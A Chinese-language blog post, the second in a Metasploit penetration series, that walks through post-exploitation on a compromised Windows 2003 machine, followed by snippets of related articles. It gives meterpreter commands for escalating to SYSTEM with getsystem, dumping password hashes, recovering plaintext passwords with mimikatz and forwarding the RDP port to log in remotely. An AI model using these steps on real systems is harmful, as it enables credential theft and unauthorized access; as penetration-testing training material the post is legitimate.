metasploit渗透第二篇

最新推荐文章于 2023-09-11 20:25:24 发布
最新推荐文章于 2023-09-11 20:25:24 发布
阅读量417 收藏 4
点赞数 1
分类专栏: 渗透测试 文章标签: 版权 远程连接
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38341596/article/details/78598270
版权

版权声明:本文为博主原创文章,转载必须写明出处。

通过metasploit 框架反弹shell

win 2003 提权与远程连接

通过[metasploit渗透第一篇](http://blog.csdn.net/qq_38341596/article/details/78566081)我们已经获得了windows用户的普通权限,相信大家不会满足于这样,因为普通用户的权限的限制大,从现在开始我们就学习windows系统的提权,因为win 2003 ,win xp , win 7/8系统的提权方式一样,所以在这篇我就统一了。至于win10我就放在metasploit渗透第三篇。

实现步骤:

  1. 提权
  2. 获取用户的hash密码
  3. 对用户的hash密码解码

  4. 进行对win 2003的远程桌面连接

    1. 提权

> meterpreter > getuid //获取用户的服务器运行
Server username: AAA\Administrator 
> meterpreter >getsystem //利用已自漏洞,自动提权为SYSTEM
...got system via technique 1 (Named Pipe Impersonation (InMemory/Admin)). 
> meterpreter > getuid ////再次查看用户
Server username: NTAUTHORITY\SYSTEM
  1. 获取用户的hash密码
    通过提权我们已经进入了对方系统的最高权限,接下来我们获取用户密码,我们使用back退出当前用户,回到meterpreter权限。

>meterpreter >Hashdump //获取密码
>meterpreter >run post/windows/gather/hashdump  //加载解密模块

hashdump

3.对用户的hash密码解码

meterpreter > load mimikatz //加载法国神器
meterpreter >Kerberos //解密

使用模块解密

加载神器

解密

4.对win 2003的远程桌面连接


meterpreter > portfwd add -l 8888 -r 192.168.254.101 -p 3389 //端口转发
新窗口打开》》
meterpreter >rdesktop -a 32 127.0.0.1:8888 -u Administrator -p 123456   
meterpreter >rdesktop  192.168.0.128 -u administrator -p 123456  //进入kali的远程桌面

metasploit渗透第二篇

hyty
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透之——利用Metasploit渗透VOIP
冰河的专栏
01-18 1214
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86536861 1.对VOIP服务踩点 use auxiliary/scanner/sip/options show options set RHOSTS 192.168.109.0/24 run 2.扫描VOIP服务 use auxiliary/scanner/sip...
使用metasploit对VOIP渗透测试提权——SipXphone Version 2.0.6.27
渗透测试
05-11 489
文章目录前言一、对VOIP服务踩点二、欺骗性VOIP电话三、对VOIP进行渗透总结 前言 本文简单介绍了使用metasploit对VOIP服务进行渗透测试提权,目标程序SipXphone Version 2.0.6.27 一、对VOIP服务踩点 使用metasploit内置的sip扫描模块进行扫描 msf6 > use auxiliary/scanner/sip/options msf6 auxiliary(scanner/sip/options) > options Module opt
Metasploit初探索
Louisnie
10-12 705
渗透测试者的困扰: 需要掌握数百个工具软件,上千条命令参数,很难去全部记住. 对于新出现的漏洞PoC/EXP有不同的运行环境要求,准备工 作繁琐. 渗透工作者大部分时间都在学习不同工具的使用习惯,如果可以统一那么就方便的多. Metasploit简介: 目前最流行,最强大,最具有扩展性的渗透测试平台软件 基于Metasploit进行渗透测试和漏洞分析的流程和方法 2003年由HD More发布第...
Metasploit - bypassuac
Nixawk
11-17 1259
Download: checkprivInstallation: cp checkpriv.rb /opt/metasploit-framework/scripts/meterpreter/checkpriv.rbmeterpreter > run checkpriv [*] Admin token: false [*] Running as SYSTEM: false [*] UAC Enab
Kali-linux本地权限提升
weixin_33840661的博客
04-18 180
上一节介绍了窃取目标系统令牌,现在来介绍窃取令牌后如何提升在目标系统上的权限。提升本地权限可以使用户访问目标系统,并且进行其他的操作,如创建用户和组等。本节将介绍本地权限提升。 同样的实现本地权限提升,也需要连接到Meterpreter会话,具体操作就不再介绍。本地权限提升的具体操作步骤如下所示。 (1)启动Meterpreter会话。执行命令如下所示: msf auxiliary(br...
网络攻击与防御-第四章 Metasploit渗透攻击.pptx
06-29
本篇资源主要讲解了Metasploit渗透攻击的概念、原理和实践操作。Metasploit是全球最受欢迎的渗透测试工具,不仅因为其方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行渗透测试。 ...
metasploit渗透第一篇
hyty的博客
11-17 992
版权声明:本文为博主原创文章,转载必须写明出处。
(word完整版)Metasploit渗透测试实例分析要点.doc
10-24
本篇文章将深入探讨Metasploit渗透测试的实例分析要点。 **第一章 引言** 随着信息技术的飞速发展,网络安全问题日益突出,信息保护成为企业和个人关注的焦点。渗透测试是保障系统安全的有效手段之一,通过模拟...
ATT&CK红队评估实战靶场-1(全网最细)
lwwzyy
12-20 4216
声明:该系列文章首发于公众号:纁玄安全,转载请注明出处!本公众号所分享内容仅用于网安爱好者之间的技术讨论,所有渗透及工具的使用都需获取授权,禁止用于违法途径,否则需自行承担,本公众号及作者不承担相应的后果。 ATT&CK红队评估实战靶场-1 目录: 1. 环境配置 插播一点网络配置的姿势 2. 实战 2.1 信息收集 2.2 web站点探测 2.3 getshell 3 漏洞 3.1 目录遍历漏洞 3.2 存储型XSS 4. ..
Windows提权
Lum1n0us's Blog
08-18 661
文章目录前言Windows中的权限基础的信息搜集创建环境getsystem提权ask模块提权 前言 在利用web漏洞拿下一台服务器主机后,由于权限很低,一般需要提权,这篇文章主要针对Windows。 Windows中的权限 主要是有三个: -system - administrator - users 我们默认都是用户权限 基础的信息搜集 此时可以先通过蚁剑的虚拟终端来进行一波信息搜集 # 获取系统版本信息 systeminfo | findstr OS # 获取主机名称 hostname # 获取
kali下通过msf中kiwi(mimikatz)模块的使用
最新发布
失心少年
09-11 1355
kiwi模块:mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。
【工具使用】——MSF使用_MSF中kiwi(mimikatz)模块的使用
weixin_45588247的博客
08-08 1万+
文章目录一、简介:二、前提:1. 提权到system权限:1.1 提到system有两个方法:1.2 进行提权:2. 进程迁移:三、kiwi模块的使用:1. creds_all:2. kiwi_cmd: 一、简介: kiwi模块:   mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。 二、前提: 1. 提权到system权限: 1.1 提到system有两个方法:   一是当前的权限是admin
MSF中mimikatz模块的使用
谢公子的博客
11-10 4070
目录 mimikatz模块的加载 mimikatz_command模块的用法 Kerberos模块 Livessp模块 MSV模块(列出密码哈希) SSP模块 tspkg模块 Wdigest模块 mimikatz模块的加载 mimikatz模块的使用需要Administrator权限或者System权限。MSF中自带mimikatz模块,MSF中的 mimikatz 模块同时支...
meterpreter之getsystem命令提权详解
redwand的博客
07-23 7971
meterpreter shell是msf上集成的一组功能强大的shell集合,当我们获取一个反弹的meterpreter shell时,可以轻松的通过各种命令对靶机进行控制。熟悉的meterpreter的同学都清楚,其中有一个getsystem命令,帮助文档说明是提权用的,没有更详细的说明,很多人会误解为这是meterpreter的一键提权工具,但每次输入这个命令,都会爆出各种“incorrect“和”denied“,本文将通过理论和实验说明此命令的适用环境及提权过程。
获取域管理员权限的几种方式
热门推荐
10-11 1万+
在不考虑直接攻击域控的情况下,如何快速获取域管理员权限呢?在大多数情况下,攻击者可以通过定位域管理员所登录的服务器,利用漏洞获取服务器system权限,找到域管理的账号、进程或是身份验证令...
msf之提权操作
帅醉了的博客
03-07 2529
愿疫情早日结束,重返校园奋斗 使用getsystem来获得最高权限 getsystem 发现却爆出这样的错误 [-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted: [-] Named Pipe Impersonation (In Memory...
Metasploit之——高级后渗透模块
冰河的专栏
01-27 1745
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86666767 1.迁移到更安全的进程 migrate [要迁移到的进程id] 2.获取系统级权限 getsystem 注:getsystem模块在比较新的Windows系统中不太稳定,最好使用本地的提升权限方法和模块来提升控制权限。 meterpreter &g...
Metasploit渗透
一个码农的笔记
01-31 4210
Metasploit渗透 在http:xxxx.xxx.xx.xxx发现任意文件上传漏洞,果断上传webshell 首先用Metasploit生成反弹马,也就是生成反弹的payload: 成功生成反弹型payload: (1)生成win下的exe msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp L
msf中使用mimikatz加载用户明文密码
qq_36992014的博客
05-08 867
meterpreter > load mimikatz meterpreter > creds_kerberos 可以获得明文密码 mimikatz 之后改名为kiwi 使用 meterpreter > help kiwi 帮助信息,以后探索
Metasploit渗透测试教程:从入门到精通
"msf的前生今世(第三十一课)1 - Metasploit渗透测试框架教程" 本文主要介绍了Metasploit框架,一个全球最广泛使用的渗透测试工具,其目的是帮助安全工程师进行渗透测试和入侵检测系统签名的开发。Metasploit遵循...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值